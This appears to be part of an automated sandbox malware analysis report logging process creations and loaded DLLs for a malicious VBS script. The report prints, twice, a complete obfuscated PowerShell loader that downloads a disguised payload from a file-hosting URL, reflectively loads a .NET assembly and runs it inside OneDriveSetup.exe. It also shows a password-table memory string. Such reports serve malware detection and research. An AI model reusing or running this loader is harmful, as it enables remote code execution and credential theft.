                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008FCC000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008F99000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008FA7000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000003.2087394606.0000000009C7D000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008FD8000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008F89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\OneDriveSetup.exe "C:\Windows\SysWOW64\OneDriveSetup.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\OneDriveSetup.exe "C:\Windows\SysWOW64\OneDriveSetup.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeSection loaded: winhttp.dllJump to behavior
